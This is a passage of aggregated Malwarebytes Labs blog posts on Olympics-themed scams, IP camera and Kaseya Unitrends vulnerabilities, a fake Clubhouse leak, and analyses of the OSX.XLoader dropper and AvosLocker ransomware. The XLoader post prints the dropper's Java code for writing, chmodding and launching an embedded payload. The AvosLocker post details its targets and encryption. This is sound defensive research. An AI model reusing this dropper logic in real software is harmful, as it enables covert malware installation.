Elsewhere, there were threats to power supplies made prior to the opening ceremony. There was also this frankly incredible tale of traffic lights, in which Vanity Fair reported that London manipulated its own traffic light system to change any red lights to green lights for officials who were scouting the city for the initial Olympic bidding process. We’ll save the best for last, and by best I do of course mean worst—an opening ceremony conspiracy theory claiming to foreshadow COVID-19. Because hey, why not.

2014 Sochi

The “You’re definitely going to be hacked in Russia” framing went into a bit of overdrive during the build up to these particular games. Indeed, that specific story regarding how easy it was to be compromised in Sochi drew a fair amount of heat.

Even much more reserved commentary pieces labelled it a “cyber war zone.” Which is interesting, because the real fireworks would arrive at later events.

2016 Rio de Janeiro

The Rio Olympics had their now traditional opening ceremony of “here come the scams.” We can see clear patterns developing over time as scammers dust off their tried and tested sporting fakeouts.

Fake tickets and lottery winnings start doing their thing. So, too, do fake ticket sites, TV promotions, and even something offering world champion status in the “amorous olympics”! Phishing and bogus domains remained a strong contender for taking the scammer gold medal, with ATM carding grabbing a runner-up spot.

Ransomware put in a less than sporting appearance, via a compromised federation website. The RIG exploit kit was also lying in wait for anyone searching for Rio cake instructions—as in the actual baked dessert—which I must admit, I didn’t see coming.

All things banking are considered a problem point in Brazil in terms of hacks and malware, so there were plenty of warnings for visitors surrounding that too. You’ll notice alongside the mainstay threats there are some new additions beginning to seep in. New techniques and tactics will continue to emerge as we move from event to event. We’ll finish off with 2016 by linking to Anonymous branded attempts to highlight the less entertaining activities happening off camera.

2018 Pyeongchang

A strong start for Team Cybercriminal as they deploy “Olympic Destroyer,” whose name is if nothing else incredibly accurate as a mission statement. After various threats down the years to interfere with the opening ceremony, the bad people finally get their wish and caused chaos.

We take a quick dip back into mobile land, as more bad apps roll into action. In this case, one app claimed to be a livestream application showing highlights. In reality, the app crashed a lot but displayed a tireless ability to pop adverts without fail.

We round this brief summary off with a worrying slice of alleged nation state attack. US officials claimed that Russian spies compromised multiple computers, and made it look as though North Korea was responsible.

Actually, no. We’ll end this summary with a bit of an epilogue to the games, some months after it had taken place. A very nasty attack there, in which Russian hackers were accused of leaking the private medical information of US Olympians Simone Biles and Venus and Serena Williams, in a reported attempt to downplay the severity of Russia’s involvement in an Olympic doping scandal.

2020 Tokyo

And now we come to the current games held in Japan. Things began early, with Twitter account compromises in February. Picking up where we left off last time, state-backed attacks from Russia were planned before the games were postponed due to the pandemic. We’ve now got the traditional alarms being sounded, but it remains to be seen where the big hits hammer home. There is evidence of malware bouncing around though, in the form of Wiper malware targeting Japanese computers.

What we can say is that law enforcement are also ringing the big “please be careful” bell. The FBI put out a warning a week ago, and sure enough, a small leak has already taken place.

People should ensure they’re running the latest version of their operating system, their security software is up to date, and think very carefully where offers, freebies, discounts, streaming, mobile apps, or too-good-to-be-true emails are concerned.

These are tried and tested methods for Olympics scammers, and they’re becoming very good at it. Let’s see if we can make them come in last place for a change.

The post The Olympics: a timeline of scams, hacks, and malware appeared first on Malwarebytes Labs.

Categories: Malware Bytes

UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root

Malware Bytes Security - Wed, 07/28/2021 - 9:04am

Researchers at RandoriSec have found serious vulnerabilities in the firmware provided by UDP Technology to Geutebrück and many other IP camera vendors. According to the researchers the firmware supplier UDP Technology fails to respond to their reports despite numerous mails and LinkedIn messages.

Because of this unwillingness of UDP Technology to respond, RandoriSec worked with Geutebrück, one of the camera vendors, to correct the 11 authenticated RCE and a complete authentication bypass that they found in the firmware.

History lessons

RandoriSec had found vulnerabilities in previous versions of the UDP technology firmware and knew from that previous experience that they could expect to face a stone wall when they reported the new vulnerabilities. UDP Technology provides firmware for several IP camera manufacturers, like:

  • Geutebruck
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence
  • Sophus
  • VCA
  • TripCorps
  • Sprinx Technologies
  • Smartec
  • Riva
  • and the camera’s they sell under their own brand name.
CISA

The Cybersecurity & Infrastructure Security Agency issued an advisory about the two Geutebrück IP camera types that were confirmed to be vulnerable, the G-Cam E2 and G-Code.

The CISA advisory includes the CVE identifiers for the found vulnerabilities. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

CVE-2021-33543 Missing authentication: allows unauthenticated remote access to sensitive files due to default user authentication settings.

CVE-2021-33544 RCE: the affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33545 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33546 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33547 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33548 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33549 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33550 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33551 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33552 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33553 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33554 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

Impact of the vulnerabilities

As you can imagine, the combination of unauthorized access to sensitive files combined with that many RCE vulnerabilities creates a treasure trove for attackers, and finding an attack method that works for you is trivial. And it should not come as a surprise that public exploits are available.

Even an attacker having access to your live-stream can be bad enough, but an attacker that has full control of your IP camera is even worse. And, sure enough, a combination of the unauthorized access and some of the RCE vulnerabilities can allow an attacker to achieve root on the IP camera’s that are running on the vulnerable firmware.

Mitigation

For the mentioned Geutebrück camera’s a patch is available (Login required) and should be installed as soon as possible. Users are urgently recommended to update to firmware Version 1.12.14.7 or later. Geutebrück worked with RandoriSec to make sure their patch fixes the vulnerabilities.

For users of other IP camera’s we can not do much more than to recommend to either disable/replace the camera’s and certainly query the vendors to find out whether their camera’s suffer from the same vulnerabilities.

As a general advice for users of IoT devices you can follow these CISA recommendations:

  • Change the default passwords of the cameras.
  • Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Vendors of the IP camera’s running UDP Technology firmware are encouraged to ask some serious questions about the development of the firmware and why UDP technology chooses not to work with security researchers in a way that benefits all the IP camera vendors instead of only the one working with the researchers. Geutebrück users know which types are vulnerable and can remedy the vulnerabilities by installing a patch. Users of the other brands are left guessing, but what we read between the lines in the RandoriSec blogpost, we fear the worst.

For a complete technical analysis of how the researchers found the vulnerabilities you are encouraged to read the RadoriSec blog about it.

The post UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Kaseya Unitrends has unpatched vulnerabilities that could help attackers expand a breach

Malware Bytes Security - Tue, 07/27/2021 - 12:34pm

It must not be easy to work at Kaseya right now. While they are working as hard as they can to help customers, and customers of their customers, recover from the REvil ransomware attack at the beginning of July, a new vulnerability in their software has been disclosed.

As a sidenote, Kaseya specifically denies on their website that they did not pay the ransom ($70 million was the initial demand) to stop the critics saying they were encouraging additional ransomware attacks fed by rumors that the decryption key was obtained by paying the ransom.

In the meantime, security researchers warn of three new zero-day vulnerabilities in the Kaseya Unitrends service and advise users not to expose the service to the Internet.

Kaseya Unitrends

Kaseya offers remote monitoring and management solutions for Managed Service Providers (MSPs). MSPs are companies that facilitate the remote management of a business’s technology and network. A managed service provider will remotely manage a business’s network so the business owner doesn’t need to hire a full-time team of their own.

Unitrends is a Kaseya company and a provider of all-in-one enterprise backup and continuity solutions. It can serve as a cloud-based enterprise backup and disaster recovery solution that can be used as a stand-alone solution or as an add-on for the Kaseya VSA remote management platform.

DIVD warns again

As Victor Gevers indicated when he was a guest in our podcast about the Kaseya VSA incident, the Dutch Institute for Vulnerability Disclosure found seven or eight zero-days in the Kaseya software. In their Kaseya limited disclosure post from earlier this month you can find a list of 7 CVE identifiers.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.” To hear about DIVD’s investigation into Kaseya VSA, listen to our conversation with DIVD Chair Victor Gevers

But the DIVD opened a new case file for Kaseya Unitrends. The summary in that case file reveals that a DIVD researcher has identified several vulnerabilities in the Kaseya Unitrends backup product versions that are lower than 10.5.2. The recommendation to mitigate the risks posed by these vulnerabilities is to not expose this service or the clients directly to the internet until Kaseya has patched these vulnerabilities.

The DIVD is all about coordinated vulnerability disclosure. This is done because the full knowledge of the vulnerabilities might enable cybercriminals to leverage the vulnerability and do a lot of harm. Coordinated vulnerability disclosure lets the vendor know what exactly is wrong, but it also informs the users that are affected by the vulnerability what the mitigation instructions are.

So, in this case, the DIVD informed Kaseya Unitrends about the details of the vulnerability and started sharing it with 68 government Computer Emergency Response Teams (CERTs) under the TLP:AMBER designation. When sharing cyber intelligence, sources may use TLP:AMBER when information requires support to be effectively acted upon, but carries risk to privacy, reputation, or operations if shared outside of the organizations involved.

Recipients are supposed to limit the sharing of TLP:AMBER information with staff in their own organization who need to know, or with service providers to mitigate risks to the member’s organization if the providers are contractually obligated to protect the confidentiality of the information. Information can be shared with those parties specified above only as widely as necessary to act on the information.

One of the recipients, however, publicized the content by uploading it to an online analyzing platform.

“An employee uploaded the TLP: AMBER labeled directly to an online analyzing platform and shared its content to all participants of that platform; because we do not have an account on that platform, we immediately requested removing this file.”

The vulnerabilities affecting the Kaseya Unitrends backup service include a mixture of authenticated remote code execution, authenticated privilege escalation, and unauthenticated remote code execution on the client side. A threat actor would need a valid user to perform remote code execution or privilege escalation on the publicly exposed Kaseya Unitrends service. Furthermore, threat actors would already need to have breached a customer network to exploit the unauthenticated client RCE. This reduces the chance of these vulnerabilities having the same impact as the REvil attack that exploited one of the vulnerabilities within Kaseya VSA.

Stay safe, everyone!

The post Kaseya Unitrends has unpatched vulnerabilities that could help attackers expand a breach appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The Clubhouse database “breach” is likely a non-breach. Here’s why.

Malware Bytes Security - Tue, 07/27/2021 - 11:44am

Before the work week ended last week Friday, a security researcher found a leak of what is claimed to be full phone numbers of users of Clubhouse, the new social media app everyone is talking about and just recently came out of beta.

Clubhouse is an audio-only social media platform where, unlike many popular social sites in the market, users can communicate with each other in voice chat rooms that can accomodate thousands of people. Think of it as Zoom without the video and text chat options. As it got exponentially popular during the pandemic, it was deemed as “the next big social network” following TikTok. And, as one Clubhouse user had put it, “It feels more personal, deeper, than other social media.”

HaveIBeenPwned-creator Troy Hunt, however, was quick to ask the important question before things get completely out of hand. After all, a compromise of 3.8 billion data—in this case, phone numbers—is not something you can easily dismiss.

Anyone seen any verification of this claim yet? https://t.co/9vdNkZ2Wj7

— Troy Hunt (@troyhunt) July 24, 2021

Below is a partial extract of the text from off the screenshot of that Dark Web forum post:

Clubhouse (valued at over $3 billion USD) is the latest social network including the most influential people in the world.

COMPROMISED DATA:
3.8 billion phone numbers (including cellphones + fixed + private + professional numbers).

Clubhouse is connected in real time to all their users’ phonebooks meaning each time you add a new phone number in your phonebook, the number is automatically added into the secret database of Clubhouse. Each number is ranked by a score (the score corresponds to the number of Clubhouse users who have this specific phone number in their phonebook).

With this score we are able to evaluate the level of the network of each phone number in the world. We can do national and international ranking of each human and organization.

The partial extract. To be honest, the last sentence doesn’t even make sense.

Alon Gal, or @UnderTheBreach on Twitter, CTO of cybercrime intelligence firm Hudson Rock, gave an unabashed take about the hack.

The new Clubhouse database leak is pretty much bullshit.

It is just a list of phone numbers, without any additional information, they could have arrived from anywhere. pic.twitter.com/fj9GnriAov

— Alon Gal (Under the Breach) (@UnderTheBreach) July 24, 2021

If you’re wondering why we shouldn’t make a big deal out of this so-called breach, Gal further explains in the same Twitter thread:

When there are at least two fields things begin to get interesting because if there is an email but I don’t know the identity of the person behind it, if I’ll see his name in the leak next to the email I will now be able to determine who that person is, same goes for phones

— Alon Gal (Under the Breach) (@UnderTheBreach) July 24, 2021

Jane Manchun Wong, or @wongmjane on Twitter, a security and app researcher, had a similar take.

I guess someone did it by uploading a contact list from like (000) 000-0000 to (999) 999-9999

and then retrieve the list of “amount of contacts on @Clubhouse” by hitting the app’s private API

I really don’t think the database is breached. It’s just scrapped data https://t.co/b566BwXDk4

— Jane Manchun Wong (@wongmjane) July 24, 2021

Many more chimed in, with some shedding light on the dark web forum post (“bad sample”) and on the poster itself (“This seller has a bad past”).

This is the same Telegram group which was selling Fake #Whatsapp database of 470 mn users "Without Name & Photo". Now they changed the group name from "Whatsapp Database Leak" to "ClubHouse Database Leak". Now selling fake @Clubhouse numbers without name and Photo. #InfoSec pic.twitter.com/1lIXOjgEMz

— Rajshekhar Rajaharia (@rajaharia) July 24, 2021

Every breach report, especially if it involves big names and/or big numbers, could drive anyone scrambling to get the full story, how it happened, how many were affected, and what should users do now. However, cybercriminals, being criminals, won’t think twice about using “The Breach angle” as a lure to score thousands of dollars from fellow data-hungry criminals.

As always, stay safe, and don’t believe every report of breach out there until it’s verified by an expert!

The post The Clubhouse database “breach” is likely a non-breach. Here’s why. appeared first on Malwarebytes Labs.

Categories: Malware Bytes

OSX.XLoader hides little except its main purpose: What we learned in the installation process

Malware Bytes Security - Mon, 07/26/2021 - 2:34pm

Last week, Check Point Research described a new Mac variant of malware they call XLoader. It was identified as being the successor of something called Formbook, a very prevalent threat in the Windows world. According to Check Point, the Mac version of the malware is being “rented” as part of a malware-as-a-service program, at the price of $49 for one month or $99 for three months.

Unfortunately, Check Point was a bit vague on the details of how the Mac version behaves, leaving folks unsure of exactly how to protect themselves against this malware. Fortunately, more details have since come to light.

How XLoader gets installed

XLoader appears to be distributed within a .jar – or Java archive – file. Such a file contains code that can be executed by Java, dropping the malware on the system. One major advantage, for the attacker, of using Java is that the “dropper” (the file responsible for installing the malware) can be cross-platform.

However, this file format has a very significant disadvantage for the attacker, which is that macOS does not, by default, include Java, and has not for quite some time. Back around 2011 to 2012, there was a flood of multiple different pieces of malware designed to infect Macs via vulnerabilities in Java, which at the time was installed on every Mac out of the box. This meant that all Macs were vulnerable, and to make matters worse, despite updates from Oracle (Java’s owner), more vulnerabilities kept being found and exploited.

Apple responded by ripping Java out of the system. Since then, the only way Java can be on a system is if the user has installed it, which most users won’t. This means that Java is no longer a very useful means of attack on modern macOS systems.

There can be a couple reasons why a JAR file might be used on macOS. One is unfamiliarity with modern macOS, from a malware developer who has Java on their system but doesn’t understand this is non-standard for some reason. This is something often seen with more amateurish malware, and there are definitely some indications of that with this malware.

However, another reason is that the malware is targeted at specific individuals who are known to have Java installed. These could be Java developers, for example, at a particular company, or perhaps employees at a company that uses Java-based tools. A source at ESET reported that they had detected this malware back in January, with the JAR file being distributed via email. This points to a targeted campaign.

The installation process

The dropper – named Statement SKBMT 09818.jar in this case – would need to be opened by the user. The good news is that, if it was downloaded from an email client or browser that uses modern file system code, it will be marked with a “quarantine” flag. This means that the Gatekeeper feature of macOS will not allow it to execute by default.

There are ways that Mac users can bypass this and open the file anyway, but not without seeing a similar warning first.

Still, a significant amount of Mac malware droppers in the last year or so have been unsigned, and have given users instructions on what to expect and how to open the file. In such cases, users can and do bypass these warnings and open the malicious installers successfully.

In the event that the user downloads the JAR file using an email client that does not use the right file system code, and thus does not set a quarantine flag, the file will immediately open when double-clicked, without any complaints. The same will also be true if the file is copied onto a non-Mac drive before being opened, such as a Windows network share, where the quarantine flag will be lost.

Once opened, the JAR file will infect the system, and strangely, will also open a .ico (icon) file containing a Microsoft word icon image.

It’s unknown why this is done. It’s not uncommon for malware to open a “decoy document.” In such cases, when the malware pretends to be a document (as in this case, where the malware is pretending to be a statement of some kind), it will then open a document for the user to look at, to assuage suspicions the user would have if no document ever opened, while it’s doing bad stuff behind the scenes.

Is this a really badly botched attempt to open a decoy document? Or is it possible that this wasn’t meant as a public release, and the file being opened is a placeholder? Either would be a reasonable explanation, but we don’t know which is true.

While the user is looking in confusion at this wonderful icon, the JAR code will install the malware in the background. On my test machine, the malware installed the following items:

~/._p1pxXl0Fz4/I8ppUnip.app
~/kIbwf02l
~/NVFFY.ico
~/LaunchAgents/com._p1pxXl0Fz4.I8ppUnip.plist

The launch agent .plist file is used to load the app from the hidden folder (._p1pxXl0Fz4) found in the user folder. The kIbwf02l file is an exact copy of the Mac mach-o executable file found inside the app, but it’s unclear why this is left there, as it isn’t actually used. It’s a suspiciously-named file that will be visible to the user and thus may raise suspicions, so its presence is odd.

The NVFFY.ico file is the Microsoft Word icon file opened by the malware as a “decoy.”

A closer look at the Java code

Extracting the Java code from the JAR file was a painless task, and the code is not obfuscated in any way. The code is quite simple, but is able to drop a payload on either Windows or Mac. If you’re not interested in looking at code, feel free to skip ahead.

The filenames are hard-coded in the JAR file, as seen here.

private static String get_crypted_filename(final int pt) { final String exe_ = "fI4sWHkeeeee"; final String mach_o = "kIbwf02ldddd"; final String display = "NVFFYfffffff";

It’s a bit of a stretch to call these filenames “encrypted,” as the only thing that has been done to them is that a specific letter has been added to the end, repeating a varying number of times. (What letter is used depends on the string in question, and is also hard-coded.) These characters are stripped off to get the filenames, resulting in the mach-o filename of kIbwf02l and the “display” document filename of NVFFY.

The malware has quite simple code for determining the system it’s running on:

public static int _GetOS() { final String OS = System.getProperty("os.name").toLowerCase(); if (OS.contains("mac")) { return 1; } if (OS.contains("win")) { return 2; } return 0; }

From there, the malware reads encrypted data from within the JAR file and writes it out to the desired location on the system (in this case, the kIbwf02l file).

private byte[] getFileFromResource(final String name) throws Exception { try (final InputStream in = this.getClass().getResourceAsStream("/resources/" + name)) { final byte[] data = new byte[16384]; final ByteArrayOutputStream buffer = new ByteArrayOutputStream(); int nRead; while ((nRead = in.read(data, 0, data.length)) != -1) { buffer.write(data, 0, nRead); } return buffer.toByteArray(); } }

From there, the malware launches the malicious process and opens the decoy document (aka “displayFile”).

if (osFile != null && osFile.length != 0) { final String absolutePath = userPath + osFilename + ((os == 1) ? "" : ".exe"); stubClass.writeBufferToFile(decrpt_data(osFile), absolutePath); if (os == 1) { final File file = new File(absolutePath); final Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>(); perms.add(PosixFilePermission.OWNER_READ); perms.add(PosixFilePermission.OWNER_WRITE); perms.add(PosixFilePermission.OWNER_EXECUTE); Files.setPosixFilePermissions(file.toPath(), perms); } processBuilder.command(absolutePath); processBuilder.start(); } final byte[] displayFile = stubClass.getFileFromResource(displayFilename); if (displayFile != null && displayFile.length != 0) { final String absolutePath2 = userPath + displayFilename + getDisplayExt(); stubClass.writeBufferToFile(decrpt_data(displayFile), absolutePath2); final File f = new File(absolutePath2); Desktop.getDesktop().open(f); } The malicious application

The malicious Mac application, dropped and executed by the JAR file, is heavily obfuscated, making it hard to learn more about what it does. According to analysis done by SentinelOne, one of the app’s main goals appears to be harvesting credentials.

The app itself is not code signed in any way. However, since it was created by the JAR and not downloaded from anywhere, it can be executed without Gatekeeper examining it or asking for user consent to run it. The launch agent .plist file is used to ensure the app is launched at startup, but explicitly does not try to keep the process alive. This means that if anything terminates the malicious process, it will not re-open until the next reboot.

The app itself has been marked as an LSUIElement, which is done to prevent its icon from showing on the Dock whenever it is running. This is a feature intended to be used by apps responsible for managing some user interface element – such as a menu bar icon – but that do not have a user interface of their own and thus can’t be interacted with directly. This prevents the Dock from being littered with these kinds of apps, but is a common technique used to prevent malicious apps from appearing in the Dock.

TL;DR

To sum up, this malware is likely to be used for targeted attacks against intended victims who are known to have Java installed. Attackers may also have knowledge that something in the victims’ environment will enable users to easily open a JAR file without being blocked by Gatekeeper.

The dropper itself is completely unsophisticated, with barely an attempt to hide anything, while the mach-o executable used in the malicious application installed on the system is quite well protected against prying eyes. This may be an indication that the two components of the malware were developed by different individuals.

This malware will be detected by Malwarebytes for Mac as OSX.XLoader. However, as of yet, data shows that Malwarebytes has not detected a single instance of this malware in the wild.

The post OSX.XLoader hides little except its main purpose: What we learned in the installation process appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (July 19 – July 25)

Malware Bytes Security - Mon, 07/26/2021 - 11:47am

Last week on Malwarebytes Labs:

Other cybersecurity news

Stay safe, everyone!

The post A week in security (July 19 – July 25) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

AvosLocker enters the ransomware scene, asks for partners

Malware Bytes Security - Fri, 07/23/2021 - 7:00pm

This blog post was authored by Hasherezade

In mid-July we responded to an incident that involved an attack on a Microsoft Exchange server. The threat actor used this entry point to get into a Domain Controller and then leveraged it as a springboard to deploy ransomware.

While examining the ransomware payload, we noticed it was a new variant which we had not heard of before. In this blog we will take a look at AvosLocker a solid, yet not too fancy new ransomware family that has already claimed several victims.

This type of ransomware attack is unfortunately all too common these days and has wreaked havoc across many industries. With the disappearance of the infamous REvil, it is possible new threat actors are actively looking to fill the void.

New ransomware, looking for partners

Avos is a relatively new ransomware, that was observed in late June and early July. Its authors started searching for affiliates through various underground forums. They announced a recruitment for “pentesters with Active Directory network experience” and “access brokers” which suggests that they want to cooperate with people who have remote access to hacked infrastructure.

In the other advert they describe the product they offer: a multi-threaded ransomware written in C++:

They offer not only the malware, but also help in managing the communication with the victim, and hosting of the data stolen during the operation. Soon, some victims of this ransomware started to emerge.

Behavioral Analysis

AvosLocker is ran manually by the attacker who remotely accessed the machine. For this reason, it is not trying to be stealthy during its run. In default mode, it works as a console application reporting details about its progress on screen.

Example: Avos in action

A sample log from the run (shortened):

drive: C: drive: D: Threads init Map: C: Searching files on: C:* file: C:\autoexec.bat Map: D: Searching files on: D:* FindFirstFileA: INVALID_HANDLE_VALUE drive D: took 0.002000 seconds Start encryption on C: Encrypting C:\autoexec.bat - ext bat - capped YES Searching files on: C:_pin* file: C:_pin\pinadx-vsextension-3.17.98314-g0c048d619.bat Start encryption on C: Encrypting C:_pin\pinadx-vsextension-3.17.98314-g0c048d619.bat - ext bat - capped YES [...] Searching files on: C:\Documents and Settings* FindFirstFileA: INVALID_HANDLE_VALUE Searching files on: C:\$Recycle.Bin* […] drive C: took 52.590000 seconds Done!! 64.620000 seconds

Looking at the log, we can see that the ransomware first “maps” the accessible drives by listing all their files. After that it goes to the encryption. The files are selected for encryption depending on their extensions.

The files that have been encrypted by AvosLocker can be identified with .avos extension appended to the original filename. While the content is unreadable, at the end we find a Base64-encoded block added:

We can assume that this Base64-encoded data contains RSA-protected AES key that was used for encrypting this file. Each attacked directory has a ransom note dropped in it, named GET_YOUR_FILES_BACK.txt:

Interestingly, the ID is not generated during the deployment, but hardcoded in the sample (which we can see easily by viewing the sample strings). This may mean that the distributors generate a sample per victim.

The link given in the ransom note guides to the Onion website, requesting the ID, that was also in the note:

Upon the ID submission, the victim is presented with the individual panel:

In addition to the casual threats about increasing the price after the deadline has passed, this ransomware adds blackmail by doxing. The additional website titled “Press releases” is provided to prove that those aren’t just empty threats:

Visual analysis

Visualizing the content of the encrypted files shows their high entropy. No patterns from the original file content were preserved. Example:

Visualization of the original file (before encryption) Visualization of the same file, encrypted by Avos

Those properties suggest that a strong encryption algorithm was used, probably in a CBC mode (Cipher Block Chaining).

Also, the same plaintext files have been encrypted into different ciphertext output. This suggests that for each file a new key (or at least a new initialization vector) was generated.

Inside

This ransomware is dedicated to be deployed by the attacker manually on the hacked machines. This purpose is reflected in the design. In contrast to most malware, AvosLocker comes without any protective (crypter) layer. Yet, it’s not completely defenseless: all the strings, and some of the APIs, are obfuscated in order to evade static detection. Yet, during its execution, it yells out on the console the logs of the performed actions, so that the attacker could observe in the real time what the program is doing.

Execution flow

The execution starts in the main function:

First, the malware checks if it was provided with the optional commandline arguments. By supplying them, the attacker can enable/disable some of the features.

Then, the mutex name is decoded (“ievah8eVki3Ho4oo”), and its presence is checked. It is done in order to prevent the ransomware from being run more than once at the time. If the mutex already exists, the execution terminates.

This malware may come with a hardcoded RSA Public Key of the attacker. This key will be further used for encrypting individual AES keys, used for encrypting files. Yet, the presence of the Public Key is optional. In case if it wasn’t provided, the application will generate a new key pair.

After this preparation, the malware proceeds to encrypt files. Depending on the argument given, it may encrypt network resources. Then, unconditionally, it encrypts drives. The encryption operations are run in new threads.

After the encryption was done, it prints information for the attacker. Then, all the running threads are finalized. At the end the malware prints the summary about how long it took to encrypt available resources.

Arguments

By default it runs as a console application, yet the console can be hidden by supplying a specific commandline argument: ‘h’ (hide). There is also a commandline argument allowing to opt out encryption of network resources: ‘n’ (network).

String obfuscation

As mentioned before, Avos uses string obfuscation. All the strings are obfuscated by XOR with the given key, and deobfuscated just before use. Although the algorithm is simple, the way it implements it is especially tedious to counteract. Rather than having one, central deobfuscating function, each of such operations is done inline. Examples:

deobfuscating Mutex name before use deobfuscating debug string before use API obfuscation

As well as the strings, some of the APIs used by the malware are obfuscated. Functions are retrieved by their checksums, which is a common trick used by malware, in order to avoid hardcoding names of the functions which may rise suspicions. Which is lesser common though, is that the function resolving the API is also used as an inline.

Example: calling a function just after searching it

This way of obfuscating API calls not only hides the used functions, but also adds volume to the code, making it more unreadable and difficult to follow.

Yet, it is easy to reveal the used function names with the help of tracing and tagging. Example – the above obfuscated function resolved to GetLogicalDrives:

Attacked targets

The ransomware encrypts all attached drives.

Additionally, unless the argument (‘n’) was given from the commandline, the ransomware proceeds to encrypt network shares. Available resources are being enumerated in a loop:

The accessible network shares are getting encrypted:

From each medium, the files are first added to the list. Then, the created list is processed by the encryption routine.

Files with the following extensions are being attacked:

ndoc docx xls xlsx ppt pptx pst ost msg eml vsd vsdx txt csv rtf wks wk1 pdf dwg onetoc2 snt jpeg jpg docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm sldm vdi vmdk vmx gpg aes ARC PAQ bz2 tbk bak tar tgz gz 7z rar zip backup iso vcd bmp png gif raw cgm tif tiff nef psd ai svg djvu m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov avi asf mpeg vob mpg wmv fla swf wav mp3 sh class jar java rb asp php jsp brd sch dch dip pl vb vbs ps1 bat cmd js asm h pas cpp c cs suo sln ldf mdf ibd myi myd frm odb dbf db mdb accdb sql sqlitedb sqlite3 asc lay6 lay mml sxm otg odg uop std sxd otp odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr crt key pfx der dat How the encryption works

Avos uses two strong encryption algorithms. Symmetric: AES – to encrypt files, and asymmetric: RSA – to encrypt the generated AES keys. This is a very common combo which provides strong data protection. It is also often used by variety of ransomware.

The RSA Key

As mentioned before, the RSA Public key may be hardcoded in the Avos sample. In the analyzed case, the following Public Key was hardcoded:

In case of lack of thereof, a new keypair is generated. The Public Key is stored for the further use, and the private key is logged on the screen, as the information for the attacker.

Example: in case if no Public Key was hardcoded in the sample, a new keypair is generated. A Private Key is displayed.

The same Private Key is also dumped in each ransom note, instead of the ID:

This suggests that this mode was created only for testing purposes, and it not intended to be used on victims. Only the mode with the Public Key hardcoded is usable in real attack scenarios.

File encryption

Before the malware proceeds to encrypt particular file, it first retrieves a list of associated processes, that may be blocking the access:

The list is retrieved with the help of RmGetList:

If any processes has been found, they are being terminated. Then the malware proceeds with encryption.

For each file, an AES key generated by a previously deployed routine is retrieved and used to initialize AES context.

After that, the AES encryption is applied on the file content.

The file is encrypted in-place (without creating additional copy), in 64-byte long chunks. A chunk of a plaintext is read, encrypted, and written back to the original file.

As we observed during the behavioral analysis, the block with the RSA encrypted, base64-encoded AES key is written at the end.

AES key generation

The generation of random keys is deployed in the function enumerating the files of a particular directory, prior to the encryption. For each listed file a new key and Initialization Vector are generated, and stored for further use.

As default, the cryptographically strong random generator is used. However, if for some reason this strong generator fails, it falls back to the naive generator (based on the standard rand() function).

This may render a flaw in the full encryption scheme. However, the chance of the strong random generator failing is too small to consider worth the attention in real life scenarios.

The malware fetches a buffer of 512 random bytes per each file, and then generates out of this a 64-character long string for the key, and a 32-characters long string for the Initialization Vector.

Example of the generated data:
the key: “6584cd273625ee121e330a981cc04e1f1d312356c9cccdb62932ea7aad53a731”
the IV: “cf0c2513b6e074267484d204a1653222”

This key and the initialization vector are further passed to a function initializing AES context. Although the created key is 64 bytes long, we must note that only 32 first characters are going to be used. Similarly, in the case of the Initialization Vector, only first 16 bytes matter. Both strings are treated as ASCII.

Preview of the file encrypted with the presented key/IV set:

Example – a ChyberChief recipe decrypting the aforementioned file, using the key and initialization vector dumped from the memory:

Valid implementation, unimpressive design

AvosLocker does not distinguish itself much from other ransomware (apart from being unusually noisy). All its features are average. Its encryption scheme seems implemented correctly, so recovering the data is not possible without obtaining the original Private Key for a particular sample. It also uses a well-established pair of algorithms: RSA and AES. Although it contains some inconsistencies in the implementation, they do not impact the main goals of this malware.

We didn’t find in the sample any routines responsible for uploading the stolen files. Yet, since the model of the delivery of this ransomware assumes manual access, it is possible that the data exfiltration is done manually by the attackers.

AvosLocker meets its objective by being a simple tool assisting in the manual attacks, and creating the expected damage.

Protection and recommendations
  • Keep software up-to-date and turn on automatic updates whenever possible
  • Enforce strong password policies and multi-factor authentication (MFA)
  • Perform backups and periodically test restoring them
  • Reduce attack surface by removing unused or unnecessary services
  • Mitigate brute-force attacks (this is a feature in our Nebula product) 
